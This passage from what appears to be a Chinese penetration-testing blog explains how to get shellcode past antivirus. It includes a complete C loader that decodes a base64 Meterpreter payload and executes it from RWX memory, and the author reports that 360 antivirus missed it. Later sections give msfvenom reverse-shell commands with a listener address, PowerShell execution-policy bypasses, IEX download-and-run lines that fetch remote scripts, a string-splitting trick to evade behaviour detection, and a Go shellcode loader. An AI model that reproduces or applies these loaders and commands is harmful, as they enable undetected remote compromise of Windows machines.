<span class="number">4</span>);</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[bufin[<span class="number">1</span>]] &lt;&lt; <span class="number">4</span> | pr2six[bufin[<span class="number">2</span>]] &gt;&gt; <span class="number">2</span>);</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[bufin[<span class="number">2</span>]] &lt;&lt; <span class="number">6</span> | pr2six[bufin[<span class="number">3</span>]]);</span><br><span class="line">		bufin += <span class="number">4</span>;</span><br><span class="line">		nprbytes -= <span class="number">4</span>;</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="comment">/* Note: (nprbytes == 1) would be an error, so just ingore that case */</span></span><br><span class="line">	<span class="keyword">if</span> (nprbytes &gt; <span class="number">1</span>) &#123;</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[*bufin] &lt;&lt; <span class="number">2</span> | pr2six[bufin[<span class="number">1</span>]] &gt;&gt; <span class="number">4</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (nprbytes &gt; <span class="number">2</span>) &#123;</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[bufin[<span class="number">1</span>]] &lt;&lt; <span class="number">4</span> | pr2six[bufin[<span class="number">2</span>]] &gt;&gt; <span class="number">2</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (nprbytes &gt; <span class="number">3</span>) &#123;</span><br><span class="line">		*(bufout++) =</span><br><span class="line">			(<span class="keyword">unsigned</span> <span class="keyword">char</span>)(pr2six[bufin[<span class="number">2</span>]] &lt;&lt; <span class="number">6</span> | pr2six[bufin[<span class="number">3</span>]]);</span><br><span class="line">	&#125;</span><br><span class="line">	*(bufout++) = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">	nbytesdecoded -= (<span class="number">4</span> - nprbytes) &amp; <span class="number">3</span>;</span><br><span class="line">	<span class="keyword">return</span> nbytesdecoded;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> <span class="keyword">char</span> basis_64[] =</span><br><span class="line"><span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Base64encode_len</span><span class="params">(<span class="keyword">int</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">return</span> ((len + <span class="number">2</span>) / <span class="number">3</span> * <span class="number">4</span>) + <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">Base64encode</span><span class="params">(<span class="keyword">char</span>* encoded, <span class="keyword">const</span> <span class="keyword">char</span>* <span class="built_in">string</span>, <span class="keyword">int</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">	<span class="keyword">char</span>* p;</span><br><span class="line">	p = encoded;</span><br><span class="line">	<span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; len - <span class="number">2</span>; i += <span class="number">3</span>) &#123;</span><br><span class="line">		*p++ = basis_64[(<span class="built_in">string</span>[i] &gt;&gt; <span class="number">2</span>) &amp; <span class="number">0x3F</span>];</span><br><span class="line">		*p++ = basis_64[((<span class="built_in">string</span>[i] &amp; <span class="number">0x3</span>) &lt;&lt; <span class="number">4</span>) |</span><br><span class="line">			((<span class="keyword">int</span>)(<span class="built_in">string</span>[i + <span class="number">1</span>] &amp; <span class="number">0xF0</span>) &gt;&gt; <span class="number">4</span>)];</span><br><span class="line">		*p++ = basis_64[((<span class="built_in">string</span>[i + <span class="number">1</span>] &amp; <span class="number">0xF</span>) &lt;&lt; <span class="number">2</span>) |</span><br><span class="line">			((<span class="keyword">int</span>)(<span class="built_in">string</span>[i + <span class="number">2</span>] &amp; <span class="number">0xC0</span>) &gt;&gt; <span class="number">6</span>)];</span><br><span class="line">		*p++ = basis_64[<span class="built_in">string</span>[i + <span class="number">2</span>] &amp; <span class="number">0x3F</span>];</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (i &lt; len) &#123;</span><br><span class="line">		*p++ = basis_64[(<span class="built_in">string</span>[i] &gt;&gt; <span class="number">2</span>) &amp; <span class="number">0x3F</span>];</span><br><span class="line">		<span class="keyword">if</span> (i == (len - <span class="number">1</span>)) &#123;</span><br><span class="line">			*p++ = basis_64[((<span class="built_in">string</span>[i] &amp; <span class="number">0x3</span>) &lt;&lt; <span class="number">4</span>)];</span><br><span class="line">			<span class="comment">// *p++ = &#x27;=&#x27;;</span></span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span> &#123;</span><br><span class="line">			*p++ = basis_64[((<span class="built_in">string</span>[i] &amp; <span class="number">0x3</span>) &lt;&lt; <span class="number">4</span>) |</span><br><span class="line">				((<span class="keyword">int</span>)(<span class="built_in">string</span>[i + <span class="number">1</span>] &amp; <span class="number">0xF0</span>) &gt;&gt; <span class="number">4</span>)];</span><br><span class="line">			*p++ = basis_64[((<span class="built_in">string</span>[i + <span class="number">1</span>] &amp; <span class="number">0xF</span>) &lt;&lt; <span class="number">2</span>)];</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="comment">//*p++ = &#x27;=&#x27;;</span></span><br><span class="line">	&#125;</span><br><span class="line">	*p++ = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line">	<span class="keyword">return</span> p - encoded;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>base64.h</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">ifndef</span> _BASE64_H_</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _BASE64_H_</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> __cplusplus</span></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line">	<span class="function"><span class="keyword">int</span> <span class="title">Base64encode_len</span><span class="params">(<span class="keyword">int</span> len)</span></span>;</span><br><span class="line">	<span class="function"><span class="keyword">int</span> <span class="title">Base64encode</span><span class="params">(<span class="keyword">char</span>* coded_dst, <span class="keyword">const</span> <span class="keyword">char</span>* plain_src, <span class="keyword">int</span> len_plain_src)</span></span>;</span><br><span class="line">	<span class="function"><span class="keyword">int</span> <span class="title">Base64decode_len</span><span class="params">(<span class="keyword">const</span> <span class="keyword">char</span>* coded_src)</span></span>;</span><br><span class="line">	<span class="function"><span class="keyword">int</span> <span class="title">Base64decode</span><span class="params">(<span class="keyword">char</span>* plain_dst, <span class="keyword">const</span> <span class="keyword">char</span>* coded_src)</span></span>;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">ifdef</span> __cplusplus</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">endif</span> <span class="comment">//_BASE64_H_</span></span></span><br></pre></td></tr></table></figure>

<p>shellcode.c</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;Windows.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&quot;base64.h&quot;</span></span></span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> buf[] =</span><br><span class="line"><span class="string">&quot;\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x64\x4a&quot;</span></span><br><span class="line"><span class="string">&quot;\x6b\x69\x31\x49\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33&quot;</span></span><br><span class="line"><span class="string">&quot;\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50&quot;</span></span><br><span class="line"><span class="string">&quot;\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a&quot;</span></span><br><span class="line"><span class="string">&quot;\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48&quot;</span></span><br><span class="line"><span class="string">&quot;\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x30&quot;</span></span><br><span class="line"><span class="string">&quot;\x67\x59\x69\x31\x67\x67\x55\x41\x48\x54\x68\x63\x6c\x30\x50&quot;</span></span><br><span class="line"><span class="string">&quot;\x45\x6b\x78\x2f\x34\x73\x30\x69\x77\x48\x57\x4d\x63\x44\x42&quot;</span></span><br><span class="line"><span class="string">&quot;\x7a\x77\x32\x73\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33&quot;</span></span><br><span class="line"><span class="string">&quot;\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64&quot;</span></span><br><span class="line"><span class="string">&quot;\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42&quot;</span></span><br><span class="line"><span class="string">&quot;\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a&quot;</span></span><br><span class="line"><span class="string">&quot;\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44&quot;</span></span><br><span class="line"><span class="string">&quot;\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33&quot;</span></span><br><span class="line"><span class="string">&quot;\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f&quot;</span></span><br><span class="line"><span class="string">&quot;\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f&quot;</span></span><br><span class="line"><span class="string">&quot;\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x77\x4b\x6a&quot;</span></span><br><span class="line"><span class="string">&quot;\x64\x67\x47\x67\x43\x41\x42\x46\x63\x69\x65\x5a\x51\x55\x46&quot;</span></span><br><span class="line"><span class="string">&quot;\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f&quot;</span></span><br><span class="line"><span class="string">&quot;\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68&quot;</span></span><br><span class="line"><span class="string">&quot;\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a&quot;</span></span><br><span class="line"><span class="string">&quot;\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32&quot;</span></span><br><span class="line"><span class="string">&quot;\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e&quot;</span></span><br><span class="line"><span class="string">&quot;\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71&quot;</span></span><br><span class="line"><span class="string">&quot;\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f&quot;</span></span><br><span class="line"><span class="string">&quot;\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59&quot;</span></span><br><span class="line"><span class="string">&quot;\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61&quot;</span></span><br><span class="line"><span class="string">&quot;\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f&quot;</span></span><br><span class="line"><span class="string">&quot;\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51&quot;</span></span><br><span class="line"><span class="string">&quot;\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77&quot;</span></span><br><span class="line"><span class="string">&quot;\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56&quot;</span></span><br><span class="line"><span class="string">&quot;\x6d\x6f\x41\x55\x2f\x2f\x56&quot;</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">	<span class="keyword">char</span> str1[<span class="number">1000</span>] = &#123; <span class="number">0</span> &#125;;</span><br><span class="line">	Base64decode(str1, buf);</span><br><span class="line">	<span class="comment">//printf(&quot;%d &quot;, sizeof(str3));</span></span><br><span class="line">	<span class="keyword">char</span>* Memory;</span><br><span class="line">	Memory = VirtualAlloc(<span class="literal">NULL</span>, <span class="keyword">sizeof</span>(str1), MEM_COMMIT | MEM_RESERVE,</span><br><span class="line">		PAGE_EXECUTE_READWRITE);</span><br><span class="line">	<span class="built_in">memcpy</span>(Memory, str1, <span class="keyword">sizeof</span>(str1));</span><br><span class="line">	((<span class="keyword">void</span>(*)())Memory)();</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译生成exe</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221183846130.png" alt="image-20220221183846130"></p>
<p>msf上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221183828731.png" alt="image-20220221183828731"></p>
<p>360动态静态均未查杀</p>
<h2 id="C"><a href="#C" class="headerlink" title="C#"></a>C#</h2><h3 id="方法-1"><a href="#方法-1" class="headerlink" title="方法"></a>方法</h3><ol>
<li>C#源码+shellcode直接编译</li>
<li>使用加载器加载C#代码，白名单程序加载，比如csc.exe</li>
</ol>
<hr>
<p>PS：由于win7环境问题，Vs2019编译出来的exe无法执行，后续调整后再补上 。但是思路和C/C++大同小异：用脚本对C#格式的shellcode进行加密编译生成exe；用ShellcodeWrapper加密生成的C#代码编译生成exe；</p>
<h2 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h2><h3 id="方法-2"><a href="#方法-2" class="headerlink" title="方法"></a>方法</h3><ol>
<li>python编译shellcode（python+C，base64编码，xor加密，AES加密）</li>
<li>python加载器</li>
</ol>
<p>环境问题，待补</p>
<h2 id="Powershell"><a href="#Powershell" class="headerlink" title="Powershell"></a>Powershell</h2><h3 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h3><h4 id="常见执行方式"><a href="#常见执行方式" class="headerlink" title="常见执行方式"></a>常见执行方式</h4><ol>
<li>网络环境直接执行代码，可以加载远程脚本</li>
<li>本地执行，需要把ps1脚本下载到本地执行</li>
</ol>
<h4 id="执行策略"><a href="#执行策略" class="headerlink" title="执行策略"></a>执行策略</h4><p>查看执行策略<code>powershell Get-ExecutionPolicy</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220221215731524.png" alt="image-20220221215731524"></p>
<blockquote>
<p>六种执行策略：</p>
<p>Unrestricted 权限最⾼，可以不受限制执⾏任意脚本</p>
<p>Restricted 默认策略，不允许任意脚本的执⾏</p>
<p>AllSigned 所有脚本必须经过签名运⾏</p>
<p>RemoteSigned 本地脚本⽆限制，但是对来⾃⽹络的脚本必须经过签名</p>
<p>Bypass 没有任何限制和提示</p>
<p>Undefined 没有设置脚本的策略</p>
</blockquote>
<p>默认情况下是禁止脚本执行的，管理员可以通过<code>powershell Set-ExecutionPolicy Unrestricted</code>设置执行策略</p>
<p>绕过执行策略的方法：</p>
<ul>
<li><p>本地读取后通过管道符运行</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell <span class="built_in">Get-Content</span> <span class="number">1</span>.ps1 | powershell <span class="literal">-NoProfile</span> -</span><br></pre></td></tr></table></figure></li>
<li><p>远程下载并通过IEX运行脚本</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell <span class="literal">-c</span> <span class="string">&quot;IEX(New-Object Net.WebClient).DownloadString(&#x27;http://[your id]/ps/a.ps1&#x27;)&quot;</span></span><br></pre></td></tr></table></figure></li>
<li><p>Bypass执行策略</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell <span class="literal">-ExecutionPolicy</span> bypass <span class="operator">-File</span> ./a.ps1</span><br></pre></td></tr></table></figure></li>
<li><p>Unrestricted执行策略标志</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell <span class="literal">-ExecutionPolicy</span> unrestricted <span class="operator">-File</span> ./a.ps1</span><br></pre></td></tr></table></figure></li>
</ul>
<h3 id="ps1本地执行"><a href="#ps1本地执行" class="headerlink" title="ps1本地执行"></a>ps1本地执行</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 10 -b &#x27;\x00&#x27; lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1</span><br></pre></td></tr></table></figure>

<p>把生成的ps1脚本放到win7本地执行</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell.exe <span class="literal">-ExecutionPolicy</span> Bypass <span class="literal">-NoExit</span> <span class="operator">-File</span> shell.ps1</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222090528846.png" alt="image-20220222090528846"></p>
<p>360动静态都可查杀</p>
<p>PS：msf编码次数过多容易报错，但是少了容易被查杀，都是有可能的</p>
<h3 id="Invoke-Shellcode加载"><a href="#Invoke-Shellcode加载" class="headerlink" title="Invoke-Shellcode加载"></a>Invoke-Shellcode加载</h3><p><a href="https://github.com/PowerShellMafia/PowerSploit">Powersploit</a>是一款基于powershell的渗透框架</p>
<p>Invoke-Shellcode可以将 shellcode 注入您选择的进程 ID 或本地 PowerShell 中</p>
<p>利用流程如下：</p>
<ol>
<li>IEX远程下载Invoke-Shellcode.ps1或者在Kali上安装搭建powersploit用于下载脚本</li>
<li>msf生成powershell脚本并监听</li>
<li>IEX远程下载msf脚本</li>
<li>用Invoke-Shellcode运行脚本</li>
</ol>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="built_in">IEX</span>(<span class="built_in">New-Object</span> Net.WebClient).DownloadString(<span class="string">&quot;https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">IEX</span>(<span class="built_in">New-Object</span> Net.WebClient).DownloadString(<span class="string">&quot;http://IP/shell.ps1&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">Invoke-Shellcode</span> <span class="literal">-Shellcode</span> (<span class="variable">$buf</span>) <span class="literal">-Force</span></span><br></pre></td></tr></table></figure>

<h3 id="Invoke-Obfuscation"><a href="#Invoke-Obfuscation" class="headerlink" title="Invoke-Obfuscation"></a>Invoke-Obfuscation</h3><p><a href="https://github.com/danielbohannon/Invoke-Obfuscation">Invoke-Obfuscation</a>是一个用来对powershell脚本编码免杀的工具，之前在做内网渗透靶场的时候用到过，具体使用可见<a href="https://jasonttu.github.io/2022/02/22/Invoke-Obfuscation%E5%B7%A5%E5%85%B7%E5%B0%8F%E8%AE%B0/">另一篇博客</a></p>
<p>生成powershell马</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_https -e x86/shikata_ga_nai -i 15 -b &#x27;\x00&#x27; lhost=192.168.221.128 lport=4444 -f psh -o shell.ps1</span><br></pre></td></tr></table></figure>

<p>运行Invoke-Obfuscation</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222101901109.png" alt="image-20220222101901109"></p>
<p>设置好脚本路径，设置编码方式，编码完成后输出脚本文件即可</p>
<p>免杀效果不如之前了，换了好几种编码方式都被杀了</p>
<h3 id="ps1行为免杀"><a href="#ps1行为免杀" class="headerlink" title="ps1行为免杀"></a>ps1行为免杀</h3><p>powershell执行远程下载或者执行shellcode容易触发行为检测</p>
<p>可以尝试对DownloadString、http等敏感词进行替换拼接，如</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">powershell -NoExit &quot;$c1=&#x27;IEX(New-Object Net.WebClient).Downlo&#x27;;$c2=&#x27;123(&#x27;&#x27;http://ip/shell.ps1&#x27;&#x27;)&#x27;.Replace(&#x27;123&#x27;,&#x27;adString&#x27;);IEX ($c1+$c2)&quot;</span><br></pre></td></tr></table></figure>

<p>经测试replace也会被行为检测，但这作为思路保留也还是可以尝试其他方法</p>
<h3 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h3><p>Powershell的行为被盯得比较紧，最好还是与其他免杀方法结合来使用，直接用powershell执行大概率会被问询</p>
<h2 id="Go"><a href="#Go" class="headerlink" title="Go"></a>Go</h2><h3 id="方法-3"><a href="#方法-3" class="headerlink" title="方法"></a>方法</h3><ol>
<li>将shellcode嵌入go代码编译成exe</li>
<li>使用go的加载器</li>
</ol>
<p>golang编译shellcode脚本网上可以找找，思路和上面几种语言一样就不测试了</p>
<h3 id="go-shellcode加载器"><a href="#go-shellcode加载器" class="headerlink" title="go-shellcode加载器"></a>go-shellcode加载器</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/brimstone/go-shellcode</span><br><span class="line">cd go-shellcode/cmd/sc</span><br><span class="line">go build</span><br></pre></td></tr></table></figure>

<p>生成HEX格式shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o shell.hex LHOST=192.168.221.128 LPORT=4444</span><br></pre></td></tr></table></figure>

<p>在linux或者windows里编译都行，直接<code>sc shellcode</code>或<code>sc.exe shellcode</code>执行</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222112803643.png" alt="image-20220222112803643"></p>
<p>360对sc并没有查杀，执行也没有查杀，但是msf收不到meterpreter一直挂，目前没有解决</p>
<h2 id="Ruby"><a href="#Ruby" class="headerlink" title="Ruby"></a>Ruby</h2><h3 id="ruby加载shellcode"><a href="#ruby加载shellcode" class="headerlink" title="ruby加载shellcode"></a>ruby加载shellcode</h3><p>没有找到ruby的加载器，操作详见<a href="https://micro8.gitbook.io/micro8/contents-1/61-70/68-ji-yu-ruby-nei-cun-jia-zai-shellcode-di-yi-ji">链接</a>，win7上没有ruby环境，在实际场景中目标服务器有ruby可以尝试使用，还是比较冷门的，工具中用ruby编译的也比较少</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>通过各种语言结合编码混淆的方式对shellcode进行自编译，免杀效果比工具篇中直接用工具进行免杀的效果更好，学习测试过程中还是存在不少问题没有解决和理解，还是需要更多的使用经验和积累</p>
<p>空的部分先挖个坑</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>免杀</tag>
      </tags>
  </entry>
</search>